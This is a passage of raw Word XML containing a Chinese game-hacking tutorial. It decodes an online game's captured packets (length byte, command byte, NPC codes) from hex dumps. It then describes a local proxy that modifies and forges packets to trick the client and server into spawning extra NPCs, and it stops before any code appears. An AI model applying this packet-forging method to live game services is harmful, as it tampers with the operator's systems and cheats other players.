    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　哈，这一下两个文件大部分都一样啦，说明我们的推理是正确的，上面就是我们需要的明文！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接下来就是搞清楚一些关键的字节所代表的含义，这就需要截获大量的数据来分析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先我们会发现每个数据包都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"F4 44"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节是变化的，但是变化很有规律。我们来看看各个包的长度，发现什么没有？对了，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节就是包的长度！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过截获大量的数据包，我们判断第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节代表指令，也就是说客户端告诉服务器进行的是什么操作。例如向服务器请求战斗指令为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"30"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，战斗中移动指令为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"D4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来，我们就需要分析一下上面第一个包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"F4 44 1F 30 6C 79 F6 05 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 89"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在这个包里包含什么信息呢？应该有通知服务器你</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的哪个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吧，我们就先来找找这个店小二的代码在什么地方。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个小喽罗（就是大理客栈外的那个咯）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SEND-&gt; 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09SEND-&gt; 0010 05 00 8A 19 00 00 00 00 11 00 02 00 00 00 C0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们根据常理分析，游戏里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种类虽然不会超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>65535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FFFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），但开发时不会把自己限制在字的范围，那样不利于游戏的扩充，所以我们在双字里看看。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>店小二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小喽罗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个包的对比，我们把目标放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"6C 79 F6 05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"CF 26 00 00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上。（对比一下很容易的，但你不能太迟钝咯，呵呵）我们再看看后面的包，在后面的包里应该还会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码，比如移动的包，游戏允许观战，服务器必然需要知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的移动坐标，再广播给观战的其他玩家。在后面第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"SEND-&gt; 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里我们又看到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"6C 79 F6 05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，初步断定店小二的代码就是它了！（这分析里边包含了很多工作的，大家可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截下数据来自己分析分析）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一个包的分析暂时就到这里（里面还有的信息我们暂时不需要完全清楚了）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们看看第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"SEND-&gt; 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再截获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黄狗的包，（狗会出来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只哦）看看包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>格式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SEND-&gt; 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00SEND-&gt; 0010 EB 03 F8 05 02 27 36 01 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　根据上面的分析，黄狗的代码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"4B 7D F6 05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100040011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），不过两只黄狗服务器怎样分辨呢？看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"EB 03 F8 05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100140011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），是上一个代码加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，呵呵，这样服务器就可以认出两只黄狗了。我们再通过野外遇敌截获的数据包来证实，果然如此。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　那么，这个包的格式应该比较清楚了：第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节为包的长度，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"DA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为指令，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个数，从第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节开始的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节代表一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的信息，多一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节来表示。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　大家如果玩过网金，必然知道随机遇敌有时会出现增援，我们就利用游戏这个增援来让每次战斗都会出现增援的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吧。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过在战斗中出现增援截获的数据包，我们会发现服务器端发送了这样一个包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F4 44 12 E9 EB 03 F8 05 02 00 00 03 00 00 00 00 00 00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节为增援</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码（这里我们就简单的以黄狗的代码来举例）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么，我们就利用单机代理技术来同时欺骗客户端和服务器吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　好了，呼叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工作到这里算是完成了一小半，接下来的事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>情，怎样修改封包和发送封包，我们下节继续讲解吧。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　四：怎么冒充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发我们需要的封包？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这里我们需要使用一个工具，它位于客户端和服务器端之间，它的工作就是进行数据包的接收和转发，这个工具我们称为代理。如果代理的工作单纯就是接收和转发的话，这就毫无意义了，但是请注意：所有的数据包都要通过它来传输，这里的意义就重大了。我们可以分析接收到的数据包，或者直接转发，或者修改后转发，或者压住不转发，甚至伪造我们需要的封包来发送。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面我们继续讲怎样来同时欺骗服务器和客户端，也就是修改封包和伪造封包。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过我们上节的分析，我们已经知道了打多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的封包格式，那么我们就动手吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先我们要查找客户端发送的包，找到战斗的特征，就是请求战斗的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个包，我们找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"F4 44 1F 30"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个特征，这是不会改变的，当然是要解密后来查找哦。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到后，表示客户端在向服务器请求战斗，我们不动这个包，转发。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续向下查找，这时需要查找的特征码不太好办，我们先查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"DA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是客户端发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息的数据包的指令，那么可能其他包也有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"DA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没关系，我们看前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节有没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"F4 44"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行了。找到后，我们的工作就开始了！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
